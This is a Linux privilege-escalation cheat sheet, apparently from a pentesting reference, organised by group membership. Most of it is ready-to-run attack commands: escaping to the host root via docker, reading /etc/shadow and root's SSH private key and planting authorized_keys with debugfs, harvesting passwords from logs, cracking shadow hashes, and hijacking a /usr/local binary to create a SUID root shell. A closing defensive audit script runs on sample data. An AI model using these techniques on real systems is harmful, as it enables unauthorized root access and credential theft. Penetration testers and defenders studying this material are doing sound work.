## Check Groups

```bash
id
groups
grep "$(whoami)" /etc/group
```
## docker Group

Full root access via a host filesystem mount.

```bash
docker run -v /:/mnt --rm -it alpine chroot /mnt bash
```

See the dedicated Docker / LXD Escape page.
## lxd Group

Import an image, mount the host filesystem, get root.

See the dedicated Docker / LXD Escape page.
## disk Group

Direct read/write access to block devices, bypassing all filesystem permissions.

### Read /etc/shadow

```bash
df -h
# Find the root partition, e.g. /dev/sda1
debugfs /dev/sda1
debugfs: cat /etc/shadow
```

### Read SSH Keys

```bash
debugfs /dev/sda1
debugfs: cat /root/.ssh/id_rsa
```

### Write Files

```bash
debugfs -w /dev/sda1
debugfs: write /tmp/authorized_keys /root/.ssh/authorized_keys
```
## adm Group

Read access to log files, which may contain credentials.

```bash
find /var/log -readable 2>/dev/null
```

### Search Logs for Passwords

```bash
grep -ri "password\|pass\|pwd" /var/log/ 2>/dev/null
grep -ri "Failed password\|Accepted password" /var/log/auth.log 2>/dev/null
```

### Auth Log — Usernames as Passwords

Users sometimes type their password into the username field, so the usernames in failed-login entries can contain passwords:

```bash
grep "Invalid user" /var/log/auth.log | awk '{print $8}' | sort -u
```

### Audit Logs

```bash
aureport --tty 2>/dev/null
grep -i "passwd\|password" /var/log/audit/audit.log 2>/dev/null
```
## video Group

Access the framebuffer — screenshot what’s on screen.

```bash
cat /dev/fb0 > /tmp/screenshot.raw
```

Get the resolution:

```bash
cat /sys/class/graphics/fb0/virtual_size
# e.g. 1920,1080
```

Convert on the attacker machine:

```bash
ffmpeg -f rawvideo -pix_fmt bgra -s 1920x1080 -i screenshot.raw screenshot.png
```

Also access GPU devices:
## shadow Group

Direct read access to /etc/shadow.

Crack the hashes:

```bash
hashcat -m 1800 shadow.hash /usr/share/wordlists/rockyou.txt
```
## staff Group

Write access to /usr/local/ without root, which allows hijacking binaries run from there.

If a root cron job or service calls a binary from /usr/local/bin/:

```bash
echo '#!/bin/bash' > /usr/local/bin/target-binary
echo 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' >> /usr/local/bin/target-binary
chmod +x /usr/local/bin/target-binary
```
## sudo Group

The user can run any command via sudo (a password is required).

If the password is unknown — check sudo token reuse or other techniques.
## root Group

Not the same as the root user, but membership may grant access to files whose group is root. Look for writable ones:

```bash
find / -group root -writable 2>/dev/null | grep -v proc
```
## Quick Reference

| Group | Impact | Technique |
|---|---|---|
| docker | Root | Mount host filesystem |
| lxd | Root | Privileged container |
| disk | Root | debugfs on block device |
| adm | Creds | Read log files |
| video | Info | Screenshot framebuffer |
| shadow | Creds | Read /etc/shadow |
| staff | Root | Write to /usr/local/ |
| sudo | Root | sudo (needs password) |
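From the defender's side, the same table can drive a host audit: list who is in each of the groups above and flag group-writable files under a /usr/local-style prefix (the staff-group hijack condition). This is an added example, not code from the original page; it assumes the standard `name:x:gid:member1,member2` format of /etc/group, and the group file and prefix below are constructed samples, not a real host.

```bash
#!/bin/sh
# Audit helper: report members of the groups covered on this page and
# group- or world-writable files under a prefix such as /usr/local.
# Pass a real group file and prefix (e.g. /etc/group and /usr/local) to
# audit a host; the samples created below are constructed for illustration.

# group:impact pairs, taken from the quick-reference table on this page.
RISKY_GROUPS="docker:Root lxd:Root disk:Root adm:Creds video:Info shadow:Creds staff:Root sudo:Root"

# audit_groups GROUPFILE
# Prints "group impact member1,member2" for every risky group that has members.
audit_groups() {
    for entry in $RISKY_GROUPS; do
        group=${entry%%:*}
        impact=${entry#*:}
        # Fourth colon-separated field of the line whose name matches exactly.
        members=$(awk -F: -v g="$group" '$1 == g && $4 != "" { print $4 }' "$1")
        [ -n "$members" ] && printf '%s %s %s\n' "$group" "$impact" "$members"
    done
    return 0
}

# audit_prefix DIR
# Lists regular files under DIR that are group- or world-writable: a root cron
# job or service executing one of these can be hijacked by any member of the
# owning group, which is the staff-group case described above.
audit_prefix() {
    find "$1" -type f \( -perm -g=w -o -perm -o=w \) 2>/dev/null | sort
}

# Constructed sample group database (not from a real host).
SAMPLE_GROUP=$(mktemp)
cat > "$SAMPLE_GROUP" <<'EOF'
root:x:0:
adm:x:4:syslog,alice
disk:x:6:
staff:x:50:bob
docker:x:999:alice,carol
users:x:100:alice,bob
EOF

# Constructed sample prefix: one group-writable script and one correctly set one.
SAMPLE_PREFIX=$(mktemp -d)
mkdir -p "$SAMPLE_PREFIX/bin"
printf '#!/bin/sh\n' > "$SAMPLE_PREFIX/bin/backup"
chmod 0775 "$SAMPLE_PREFIX/bin/backup"
printf '#!/bin/sh\n' > "$SAMPLE_PREFIX/bin/safe"
chmod 0755 "$SAMPLE_PREFIX/bin/safe"
trap 'rm -rf "$SAMPLE_GROUP" "$SAMPLE_PREFIX"' EXIT

audit_groups "$SAMPLE_GROUP"
audit_prefix "$SAMPLE_PREFIX"
```

On a real host, any Root-impact line from `audit_groups` deserves the same scrutiny as a sudoers entry, and every path printed by `audit_prefix` should be checked against root cron jobs and unit files.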